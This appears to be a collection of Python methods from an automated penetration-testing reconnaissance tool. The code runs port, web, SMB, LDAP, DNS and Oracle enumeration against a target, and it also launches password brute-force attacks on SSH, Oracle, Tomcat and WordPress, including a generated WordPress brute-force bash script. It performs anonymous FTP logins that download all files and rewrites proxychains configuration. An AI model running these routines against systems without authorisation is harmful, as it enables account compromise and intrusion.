def proxyScan(self): """This is the Web Proxy scan function that is called by lib/enumProxy.py. This function will attempt to run, dirsearch, whatweb, and nikto""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() proxy_http_ports = npp.proxy_http_ports proxy_ports = np.proxy_ports if len(proxy_http_ports) == 0: pass else: c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if not os.path.exists(c.getPath("proxy", "proxyDir")): os.makedirs(c.getPath("proxy", "proxyDir")) if not os.path.exists(c.getPath("proxy", "proxyWeb")): os.makedirs(c.getPath("proxy", "proxyWeb")) proxy_commands = [] for proxy in proxy_ports: print(f"""{fg.li_cyan} Enumerating HTTP Ports Through Port: {proxy}, Running the following commands: {fg.rs}""") proxy_commands.append(c.getCmd("proxy", "whatwebProxyServer", proxy=proxy)) if len(proxy_http_ports) != 0: for proxy_http_port in proxy_http_ports: proxy_commands.append(c.getCmd("proxy", "whatwebProxyHttpPorts", proxy=proxy, httpProxy=proxy_http_port)) proxy_commands.append(c.getCmd("proxy", "dirsearchHttpProxyPortsDict", proxy=proxy, httpProxy=proxy_http_port)) proxy_commands.append(c.getCmd("proxy", "niktoProxyHttpPort", proxy=proxy, httpProxy=proxy_http_port)) self.proxy_processes = tuple(proxy_commands)
def Scan(self): """Create Aquatone Report based off of the dirsearch results. If the length of urls.txt is greater than 150, aquatone won't be run as this might be an indication of too many false positives. """ np = nmapParser.NmapParserFunk(self.target) np.openPorts() npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) cmd_info = "[" + fg.li_green + "+" + fg.rs + "]" ssl_ports = np.ssl_ports http_ports = np.http_ports proxy_http_ports = npp.proxy_http_ports proxy_ssl_ports = npp.proxy_ssl_ports proxy_ports = np.proxy_ports all_web_ports = [] all_web_proxy_ports = [] for x in ssl_ports: all_web_ports.append(x) for x in http_ports: all_web_ports.append(x) for x in proxy_http_ports: all_web_proxy_ports.append(x) for x in proxy_ssl_ports: all_web_proxy_ports.append(x) all_web_ports_comma_list = ",".join(map(str, all_web_ports)) all_web_proxy_ports_comma_list = ",".join(map(str, all_web_proxy_ports)) if not os.path.exists(c.getPath("web", "aquatoneDir")): os.makedirs(c.getPath("web", "aquatoneDir")) if os.path.exists(c.getPath("web", "aquatoneDirUrls")): check_lines = f"""wc -l {c.getPath("web","aquatoneDirUrls")} | cut -d ' ' -f 1""" num_urls = check_output(check_lines, stderr=STDOUT, shell=True).rstrip() # ToDo: open urls.txt and sort urls by occurance of response codes. if int(num_urls) < 150 and (int(num_urls) != 0): aquatone_cmd = c.getCmd("web", "aquatone", allWebPorts=all_web_ports_comma_list) print(cmd_info, aquatone_cmd) call(aquatone_cmd, shell=True) if not which("firefox"): pass else: if os.path.exists(c.getPath("web", "aquatoneReport")): print(f"""{fg.cyan}Opening Aquatone Report {fg.rs}""") open_in_ff_cmd = f"""firefox {c.getPath("web","aquatoneReport")} &""" call(open_in_ff_cmd, shell=True) if os.path.exists(c.getPath("proxy", "aquatoneDirProxyUrls")): check_lines = f"""wc -l {c.getPath("proxy","aquatoneDirProxyUrls")} | cut -d ' ' -f 1""" num_urls = check_output(check_lines, stderr=STDOUT, shell=True).rstrip() if int(num_urls) < 150 and (int(num_urls) != 0): aquatone_cmd = c.getCmd("proxy", "aquatoneProxy", allWebProxyPorts=all_web_proxy_ports_comma_list, proxyPorts=proxy_ports[0]) print(cmd_info, aquatone_cmd) call(aquatone_cmd, shell=True) if not which("firefox"): pass else: if os.path.exists(c.getPath("proxy", "aquatoneProxyReport")): open_in_ff_proxy_cmd = f"""firefox {c.getPath("proxy", "aquatoneProxyReport")} &""" call(open_in_ff_proxy_cmd, shell=True)
def Scan(self): """This Scan() Function will run various oracle scanning tools and attempt to find valid SID's along with other useful information. The following tools will be used, Nmap, tnscmd10g, osscanner, and ODAT.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() oracle_tns_ports = np.oracle_tns_ports if len(oracle_tns_ports) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if not os.path.exists(c.getPath("oracle", "oracleDir")): os.makedirs(c.getPath("oracle", "oracleDir")) print(fg.cyan + "Enumerating ORACLE, Running the following commands:" + fg.rs) # string_oracle_ports = ",".join(map(str, oracle_tns_ports)) commands = [] commands.append(c.getCmd("oracle", "nmapOracle")) commands.append(c.getCmd("oracle", "tnscmd10g", mode="ping")) commands.append(c.getCmd("oracle", "tnscmd10g", mode="version")) commands.append(c.getCmd("oracle", "oscanner")) commands.append(c.getCmd("oracle", "odatTNS", mode="ping")) commands.append(c.getCmd("oracle", "odatTNS", mode="version")) commands.append(c.getCmd("oracle", "odatTNS", mode="status")) self.processes = tuple(commands)
def SshSingleUserBrute(self): """Run patator with seclists probable top 1575 wordlist against a single user specified as a command line argument.""" cmd_info = "[" + fg.green + "+" + fg.rs + "]" c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) cl = helper_lists.Cewl(self.target) if not os.path.exists(c.getPath("wordlists", "CewlPlus")): cl.CewlWordlist() green = fg.li_green teal = fg.li_cyan reset = fg.rs np = nmapParser.NmapParserFunk(self.target) np.openPorts() if os.path.exists(c.getPath("wordlists", "CewlPlus")): if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0: print( f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}""" ) patator_cmd = c.getCmd("ssh", "patator_ssh_cewl_auto", port=self.port, user=self.user) print(f"""{cmd_info} {patator_cmd}""") call(patator_cmd, shell=True) else: print( f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}""" ) patator_cmd = c.getCmd("ssh", "patator_ssh_auto", port=self.port, user=self.user) print(f"""{cmd_info} {patator_cmd}""") call(patator_cmd, shell=True)
def Scan(self): """This Scan() Funciton will run the following tools, SMBCLIENT, NMBLOOKUP, NBTSCAN, SMBSCAN, AND ENUM4LINUX""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() smb_ports = np.smb_ports if len(smb_ports) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if not os.path.exists(c.getPath("smb", "smbDir")): os.makedirs(c.getPath("smb", "smbDir")) print( fg.cyan + "Enumerating NetBios SMB Samba Ports, Running the following commands:" + fg.rs) commands = [] commands.append(c.getCmd("smb", "smbclient")) commands.append(c.getCmd("smb", "nmblookup")) commands.append(c.getCmd("smb", "nmapSmb")) commands.append(c.getCmd("smb", "nbtscan")) commands.append(c.getCmd("smb", "smbmapH")) commands.append(c.getCmd("smb", "smbmapHR")) commands.append(c.getCmd("smb", "smbmapNull")) commands.append(c.getCmd("smb", "smbmapNullR")) commands.append(c.getCmd("smb", "enum4linux")) self.processes = tuple(commands)
def proxyEnum(self): """Helper funciton to call The Check Proxy and Enumerate Proxy Class's / Functions.""" pscan = enumProxy.CheckProxy(self.target) pscan.Scan() pr = nmapParser.NmapParserFunk(self.target) pr.openProxyPorts() pscan.Enum() proxy_commands = pscan.all_processes self.mpRun(proxy_commands)
def Scan(self): """If there is an open http-proxy port from nmaps results. Try to add the server IP to your proxychains config file and then proceed to scan the target again through the proxy port using proxychains and nmap. If more ports are discovered open, proceed to enumerate all found open ports through the http-proxy port.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() proxyPorts = np.proxy_ports hpl = helper_lists.topPortsToScan() topTCP = hpl.topTCP topTcpPortsString = ",".join(map(str, topTCP)) cmd_info = "[" + fg.li_green + "+" + fg.rs + "]" if len(proxyPorts) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) duplicate_cmds = [] add_line_cmd = rf"""sed -e "\$ahttp {self.target} {proxyPorts[0]}" -i /etc/proxychains.conf""" comment_out_line_cmd = ( f"""sed -e '/socks5/ s/^#*/#/' -i /etc/proxychains.conf""") proxy_config_file = "/etc/proxychains.conf" try: pcCF = open(proxy_config_file, "r") for line in pcCF: parsed_lines = line.rstrip() if not parsed_lines.startswith("#"): tor_match = re.findall("socks5", parsed_lines) sorted_tor_matches = sorted(set(tor_match), reverse=True) if "socks5" in sorted_tor_matches: duplicate_cmds.append(comment_out_line_cmd) if (parsed_lines.startswith("#") or not parsed_lines.startswith('#')): matches = re.findall(f"http {self.target}", parsed_lines) sorted_matches = sorted(set(matches), reverse=True) if f"http {self.target}" not in sorted_matches: duplicate_cmds.append(add_line_cmd) pcCF.close() sorted_cmds = sorted(set(duplicate_cmds)) if len(sorted_cmds) != 0: for cmd in sorted_cmds: call(cmd, shell=True) except FileNotFoundError as fnf_error: print(fnf_error) exit() if not os.path.exists(c.getPath("proxy", "proxyDir")): os.makedirs(c.getPath("proxy", "proxyDir")) proxychains_nmap_top_ports_cmd = c.getCmd( "proxy", "proxychainsNmapTopPorts", topTcpPorts=topTcpPortsString) print(cmd_info, proxychains_nmap_top_ports_cmd) call(proxychains_nmap_top_ports_cmd, shell=True)
def sslProxyScan(self): """This function is called by lib/enumProxy.py and will enumerate HTTPS/SSL Web Servers. It will run, whatweb, dirsearch, and nikto.""" npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() np = nmapParser.NmapParserFunk(self.target) np.openPorts() proxy_ssl_ports = npp.proxy_ssl_ports proxy_ports = np.proxy_ports if len(proxy_ssl_ports) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if not os.path.exists(c.getPath("proxy", "proxyDir")): os.makedirs(c.getPath("proxy", "proxyDir")) if not os.path.exists(c.getPath("proxy", "proxyWebSSL")): os.makedirs(c.getPath("proxy", "proxyWebSSL")) proxy_commands = [] for proxy in proxy_ports: print( f"""{fg.li_cyan} Enumerating HTTPS Ports Through {proxy}, Running the following commands: {fg.rs}""" ) for proxy_ssl_port in proxy_ssl_ports: proxy_commands.append( c.getCmd("proxySSL", "whatwebSSLProxy", proxy=proxy, proxySSLPort=proxy_ssl_port)) proxy_commands.append( c.getCmd("proxySSL", "dirsearchProxySSLDict", proxySslPort=proxy_ports, proxy=proxy_ssl_port)) proxy_commands.append( c.getCmd("proxySSL", "niktoProxySSL", proxySSLPort=proxy, proxy=proxy_ssl_port)) self.proxy_processes = tuple(proxy_commands)
def OraclePwn(self): """OraclePwn will run a helper lib/oracle.sh bash script which will attempt to bruteforce Oracle if any valid SID's are found from the Scan() Functions results.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() oracle_tns_ports = np.oracle_tns_ports if len(oracle_tns_ports) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) oracle_pwn = f"""bash {c.getPath("oracle","oracleBrute")} {self.target}""" call(oracle_pwn, shell=True)
def ScanWebOption(self): """Enumerate Web Server ports based on nmaps output. This function will run the following tools; WhatWeb, WafW00f, Dirsearch, Nikto, and curl robots.txt This is almost identical to the normal web scan except it uses much larger wordlists """ np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports dn = domainFinder.DomainFinder(self.target) dn.getRedirect() hostnames = dn.redirect_hostname if len(http_ports) == 0: pass else: reset = fg.rs print(f"""{fg.li_cyan}Enumerating HTTP Ports, Running the following commands: {reset}""") c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) commands = [] if not os.path.exists(c.getPath("web", "webDir")): os.makedirs(c.getPath("web", "webDir")) if not os.path.exists(c.getPath("web", "aquatoneDir")): os.makedirs(c.getPath("web", "aquatoneDir")) if hostnames: sorted_hostnames = sorted(set(hostnames)) for hostname in sorted_hostnames: for port in http_ports: commands.append(c.getCmd("web", "whatwebHttpHost", host=hostname, port=port)) # commands.append(c.getCmd("web", "eyewitnessHost", host=hostname, port=port)) # commands.append(c.getCmd("web", "wafw00fHost", host=hostname, port=port)) # commands.append(c.getCmd("web", "curlRobotsHost", host=hostname, port=port)) commands.append(c.getCmd("web", "dirsearchHttpHostDListMed", host=hostname, port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpHostRaftLargeFiles", host=hostname, port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpHostRaftLargeDirs", host=hostname, port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpHostForeign", host=hostname, port=port, url=self.web)) # commands.append(c.getCmd("web", "niktoHost", host=hostname, port=port)) else: for port in http_ports: commands.append(c.getCmd("web", "whatwebHttpTarget", port=port)) # commands.append(c.getCmd("web", "eyewitnessTarget", port=port)) # commands.append(c.getCmd("web", "wafw00fTarget", port=port)) # commands.append(c.getCmd("web", "curlRobotsTarget", port=port)) commands.append(c.getCmd("web", "dirsearchHttpTargetDListMed", port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpTargetRaftLargeFiles", port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpTargetRaftLargeDirs", port=port, url=self.web)) commands.append(c.getCmd("web", "dirsearchHttpTargetForeign", port=port, url=self.web)) # commands.append(c.getCmd("web", "niktoHost", port=port)) self.processes = tuple(commands)
def topUdpAllTcp(self): """topUdpAllTcp will run a full nmap tcp port scan and a top udp ports scan""" c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) np = nmapParser.NmapParserFunk(self.target) np.openPorts() hpl = helper_lists.topPortsToScan() topUDP = hpl.topUDP topUdpPortsString = ",".join(map(str, topUDP)) commands = [] commands.append(c.getCmd("nmap", "nmapFullTcpScan")) commands.append( c.getCmd("nmap", "nmapTopUdpScan", topUdpPorts=topUdpPortsString)) self.processes = tuple(commands)
def Enum(self): """This is a helper function that will run all the Enumeration Commands Based off of nmaps proxychain original output scan if new ports are discovered.""" npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() np = nmapParser.NmapParserFunk(self.target) np.openPorts() open_proxy_ports = np.proxy_ports if len(open_proxy_ports) == 0: pass else: c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) pweb = enumWeb.EnumWeb(self.target) pweb.proxyScan() http_proxy_commands = pweb.proxy_processes psslweb = enumWebSSL.EnumWebSSL(self.target) psslweb.sslProxyScan() ssl_proxy_commands = psslweb.proxy_processes all_commands = [] proxy_tcp_ports = npp.proxy_tcp_ports tcp_proxy_ports = ",".join(map(str, proxy_tcp_ports)) default_command = c.getCmd("proxy", "proxychainsDiscoveredPorts", openTcpProxyPorts=tcp_proxy_ports) all_commands.append(default_command) for cmd in http_proxy_commands: all_commands.append(cmd) for cmd in ssl_proxy_commands: all_commands.append(cmd) sorted_commands = sorted(set(all_commands), reverse=True) commands_to_run = [] for i in sorted_commands: commands_to_run.append(i) allCmds = tuple(commands_to_run) self.all_processes = allCmds
def Scan(self): """If Ldap ports are open, run nmap ldap scripts, enum4linux and the results will be fed to the ldap.sh bash script.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() ldap_ports = np.ldap_ports if len(ldap_ports) == 0: pass else: c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if not os.path.exists(c.getPath("ldap", "ldapDir")): os.makedirs(c.getPath("ldap", "ldapDir")) print(fg.cyan + "Enumerating LDAP: Lightweight Directory Access Protocol, Running the following commands:" + fg.rs) string_ldap_ports = ",".join(map(str, ldap_ports)) commands = [] commands.append(c.getCmd("ldap", "nmapLdap", ldapPorts=string_ldap_ports)) commands.append(c.getCmd("ldap", "enum4linuxLdap")) self.processes = tuple(commands)
def SshMultipleUsersBruteCustom(self): """Run patator with custome wordlist against a single user specified as a command line argument.""" cmd_info = "[" + fg.green + "+" + fg.rs + "]" green = fg.li_green teal = fg.li_cyan reset = fg.rs c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) np = nmapParser.NmapParserFunk(self.target) np.openPorts() print( f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.users}{reset}""" ) patator_cmd = c.getCmd("ssh", "patator_ssh_multiple_users_custom", port=self.port, users=self.users, wordlist=self.passList) print(f"""{cmd_info} {patator_cmd}""") call(patator_cmd, shell=True)
def anonymousLogin(self): np = nmapParser.NmapParserFunk(self.target) np.allOpenPorts() ftpPorts = np.ftp_ports if len(ftpPorts) != 0: for port in ftpPorts: try: ftp = ftplib.FTP() ftp.connect(self.target, port) ftp.login('anonymous', '') print(ftp.getwelcome()) ftp.set_pasv(1) print(ftp.dir()) print(ftp.nlst()) print(f'\n[{fg.li_green}*{fg.rs}] ' + str(self.target) + f'{fg.white} FTP Anonymous Logon Succeeded!{fg.rs}') self.ftpDownloadAll(port) except Exception as e: print(str(e)) print(f'\n[{fg.li_red}!{fg.rs}] ' + str(self.target) + ' FTP Anonymous Logon Failed.') return False
def vulnCheck(self): """Vuln Check will check if OpenSSH is vulnerable to Username Enumeration. If it is, A message will be printed to the User. This feature can be enabled to automatically always brute force SSH if the instance is a vulnerable version, however, I've changed this feature to not run automatically as that option should be left up to the user, among various other reasons.""" cmd_info = "[" + fg.green + "+" + fg.rs + "]" manual_cmd_info = "[" + fg.li_yellow + "+" + fg.rs + "]" blue = fg.li_blue red = fg.red green = fg.li_green reset = fg.rs np = nmapParser.NmapParserFunk(self.target) np.openPorts() ssh_product = np.ssh_product ssh_version = np.ssh_version c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) # Check what version OPENSSH is # If OpenSSH version is less than 7.7, Enumerate Users # If valid Unique User is found, Brute Force Passwords if len(ssh_product) == 1: if ssh_version is not None: string_ssh_version = " ".join(map(str, ssh_version)) if len(string_ssh_version) >= 2: lowercase_ssh_version = str(string_ssh_version).lower() first_two_nums = lowercase_ssh_version[0:3] int_first_two_nums = float(first_two_nums) if ssh_product[0] == "OpenSSH": if int_first_two_nums < float(7.7): ssh_port = np.ssh_ports print(f"""{cmd_info} {blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}VULNERABLE to Username Enumeration{reset}""") print(f"""{green}Consider running:{reset}""") print(f"""{manual_cmd_info} {c.getCmd("ssh", "ssh_user_enum", port=ssh_port[0])}""") # sb = brute.Brute(self.target, "ssh", ssh_port) # sb.SshUsersBrute() else: print(f"""{cmd_info} {blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} Vulnerable to Username Enumeration""")
def Scan(self): """Enumerate DNS server if any hostnames are found from autorecon.lib/domainFinder.py and if port 53 is open.""" print(fg.cyan + "Checking For Virtual Host Routing and DNS" + fg.rs) np = nmapParser.NmapParserFunk(self.target) np.openPorts() dnsPorts = np.dns_ports dn = domainFinder.DomainFinder(self.target) dn.Scan() redirect_hostname = dn.redirect_hostname fqdn_hostname = dn.fqdn_hostname c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) commands = [] if len(redirect_hostname) != 0: for d in redirect_hostname: self.hostnames.append(d) if len(fqdn_hostname) != 0: for d in fqdn_hostname: self.hostnames.append(d) if len(self.hostnames) != 0 and (len(dnsPorts) != 0): if not os.path.exists(c.getPath("dns", "dnsDir")): os.makedirs(c.getPath("dns", "dnsDir")) if not os.path.exists(c.getPath("web", "aquatoneDir")): os.makedirs(c.getPath("web", "aquatoneDir")) # string_hosts = " ".join(map(str, self.hostnames)) basename = [] for host in self.hostnames: basename.append(".".join(host.split('.')[-2:])) unique_hosts = sorted(set(basename)) for host in unique_hosts: commands.append(c.getCmd("dns", "dnsenum", hosts=host)) # commands.append(c.getCmd("dns", "vhost", hosts=host)) self.processes = tuple(commands)
def CMS(self): """If a valid CMS is found from initial Web Enumeration, more specifically, WhatWebs results, Then proceed to Enumerate the CMS further using Wpscan, Magescan, Nmap, Droopescan, Joomscan, and davtest, hydra, and will create a brute force bash script using Cewl, which can then be used by WpScan to try and brute force Users and passwords.""" c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports dn = domainFinder.DomainFinder(self.target) dn.getRedirect() hostnames = dn.redirect_hostname another_array_of_hostnames = [] if os.path.exists(c.getPath("web", "vhostnames")): with open(c.getPath("web", "vhostnames"), "r") as vhfile: lines = vhfile.readlines() for vh in lines: another_array_of_hostnames.append(vh) if len(hostnames) != 0: for d in hostnames: another_array_of_hostnames.append(d) cms_commands = [] if len(http_ports) == 0: pass else: for http_port in http_ports: whatweb_files = [] whatweb_hostnames = [] dir_list = [ d for d in glob.iglob(c.getPath("report", "reportGlob"), recursive=True) if os.path.isdir(d) ] for d in dir_list: reportFile_list = [ fname for fname in glob.iglob(f"""{d}/*""", recursive=True) if os.path.isfile(fname) ] for rf in reportFile_list: if "nmap" not in rf: if "whatweb" in rf: if str(http_port) in rf: whatweb_files.append(rf) if len(another_array_of_hostnames) != 0: for host in another_array_of_hostnames: if host in rf: whatweb_hostnames.append(host) if len(whatweb_files) != 0: for i in whatweb_files: cms_strings = [ "WordPress", "Magento", "tomcat", "WebDAV", "Microsoft-IIS 6.0", "Drupal", "Joomla", "Webmin", ] try: with open(i, "r") as wwf: for word in wwf: fword = ( word.replace("[", " ") .replace("]", " ") .replace(",", " ") ) for cms in cms_strings: if cms in fword: if len(whatweb_hostnames) != 0: for hn in whatweb_hostnames: if hn in i: if "WordPress" in cms: wpscan_cmd = c.getCmd("web", "wpscanHttpHost", host=hn, httpPort=http_port) cms_commands.append(wpscan_cmd) if "Drupal" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Drupal")) cms_commands.append(c.getCmd("web", "droopescanHost", host=hn, httpPort=http_port)) if "Joomla" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Joomla")) cms_commands.append(c.getCmd("web", "joomscanHost", host=hn, httpPort=http_port)) cms_commands.append(c.getCmd("web", "joomlavsHost", host=hn, httpPort=http_port)) if "Magento" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Magento")) cms_commands.append(c.getCmd("web", "magescanHost", host=hn, httpPort=http_port)) if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms): if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="WebDAV")) webdav_cmd = c.getCmd("web", "davtestHost", host=hn) webdav_cmd2 = c.getCmd("web", "webDavNmap", httpPort=http_port) cms_commands.append(webdav_cmd) cms_commands.append(webdav_cmd2) if "tomcat" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="tomcat")) cms_commands.append(c.getCmd("web", "tomcatHydraHost", host=hn, httpPort=http_port)) if "Webmin" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Webmin")) else: if "WordPress" in cms: wpscan_cmd = c.getCmd("web", "wpscanHttpTarget", httpPort=http_port) cms_commands.append(wpscan_cmd) manual_brute_force_script = f"""#!/bin/bash if [[ -n $(grep -i "User(s) Identified" {c.getPath("web","wpscanHttpTarget", httpPort=http_port)}) ]]; then grep -w -A 100 "User(s)" {c.getPath("web","wpscanHttpTarget", httpPort=http_port)} | grep -w "[+]" | grep -v "WPVulnDB" | cut -d " " -f 2 | head -n -7 >{c.getPath("web", "wordpressUsers")} {c.getCmd("web", "CewlWeb", httpPort=http_port)} sleep 10 echo "Adding John Rules to Cewl Wordlist!" {c.getCmd("web", "cewl2John")} sleep 3 # brute force again with wpscan {c.getCmd("web", "wpscanCewlBrute", httpPort=http_port)} sleep 1 if grep -i "No Valid Passwords Found" {c.getPath("web", "wpscanCewlBrute")}; then if [[ -s {c.getPath("web", "johnCewlWordlist")} ]]; then {c.getCmd("web", "wpscanCewlJohnBrute", httpPort=http_port)} else echo "John wordlist is empty :(" fi sleep 1 if grep -i "No Valid Passwords Found" {c.getPath("web", "wordpressJohnCewlBrute")}; then {c.getCmd("web", "wpscanFastTrackBrute", httpPort=http_port)} fi fi fi """ try: with open(c.getPath("web", "wpscanBashBruteScript"), "w") as wpb: print("Creating wordpress Brute Force Script...") wpb.write(manual_brute_force_script) call(f"""chmod +x {c.getPath("web", "wpscanBashBruteScript")}""", shell=True) except FileNotFoundError as fnf_error: print(fnf_error) if "Drupal" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Drupal")) cms_commands.append(c.getCmd("web", "droopescan", httpPort=http_port)) if "Joomla" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Joomla")) cms_commands.append(c.getCmd("web", "joomscan", httpPort=http_port)) cms_commands.append(c.getCmd("web", "joomlavsTarget", httpPort=http_port)) if "Magento" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Magento")) cms_commands.append(c.getCmd("web", "magescan", httpPort=http_port)) if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms): if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="WebDAV")) webdav_cmd = c.getCmd("web", "davtest") webdav_cmd2 = c.getCmd("web", "webDavNmap", httpPort=http_port) cms_commands.append(webdav_cmd) cms_commands.append(webdav_cmd2) if "tomcat" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="tomcat")) cms_commands.append(c.getCmd("web", "tomcatHydra", httpPort=http_port)) if "Webmin" in cms: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Webmin")) except FileNotFoundError as fnf_error: print(fnf_error) continue sorted_commands = sorted(set(cms_commands)) commands_to_run = [i for i in sorted_commands] self.cms_processes = tuple(commands_to_run)
def Scan(self): """Create Aquatone Report based off of the dirsearch results. If the length of urls.txt is greater than 150, aquatone won't be run as this might be an indication of too many false positives. """ np = nmapParser.NmapParserFunk(self.target) np.openPorts() npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) cmd_info = "[" + fg.li_green + "+" + fg.rs + "]" ssl_ports = np.ssl_ports http_ports = np.http_ports proxy_http_ports = npp.proxy_http_ports proxy_ssl_ports = npp.proxy_ssl_ports proxy_ports = np.proxy_ports all_web_ports = [] all_web_proxy_ports = [] for x in ssl_ports: all_web_ports.append(x) for x in http_ports: all_web_ports.append(x) for x in proxy_http_ports: all_web_proxy_ports.append(x) for x in proxy_ssl_ports: all_web_proxy_ports.append(x) all_web_ports_comma_list = ",".join(map(str, all_web_ports)) all_web_proxy_ports_comma_list = ",".join(map(str, all_web_proxy_ports)) if not os.path.exists(c.getPath("web", "aquatoneDir")): os.makedirs(c.getPath("web", "aquatoneDir")) aquatone_urls = c.getPath("web", "aquatoneDirUrls") def get_num_urls(filepath: str) -> int: with open(filepath, 'r') as fp: _num_urls = len([ l.rstrip() for l in fp.readlines() if l.startswith('http') ]) return _num_urls if os.path.exists(aquatone_urls): num_urls = get_num_urls(aquatone_urls) if num_urls < 150 and (num_urls != 0): aquatone_cmd = c.getCmd("web", "aquatone", allWebPorts=all_web_ports_comma_list) print(cmd_info, aquatone_cmd) call(aquatone_cmd, shell=True) if not which("firefox"): pass else: if os.path.exists(c.getPath("web", "aquatoneReport")): print(f"""{fg.cyan}Opening Aquatone Report {fg.rs}""") open_in_ff_cmd = f"""firefox {c.getPath("web","aquatoneReport")} &""" call(open_in_ff_cmd, shell=True) aquatone_proxy_urls = c.getPath("proxy", "aquatoneDirProxyUrls") if os.path.exists(aquatone_proxy_urls): num_urls = get_num_urls(aquatone_proxy_urls) if num_urls < 150 and (num_urls != 0): aquatone_cmd = c.getCmd( "proxy", "aquatoneProxy", allWebProxyPorts=all_web_proxy_ports_comma_list, proxyPorts=proxy_ports[0]) print(cmd_info, aquatone_cmd) call(aquatone_cmd, shell=True) if not which("firefox"): pass else: if os.path.exists(c.getPath("proxy", "aquatoneProxyReport")): open_in_ff_proxy_cmd = f"""firefox {c.getPath("proxy", "aquatoneProxyReport")} &""" call(open_in_ff_proxy_cmd, shell=True)
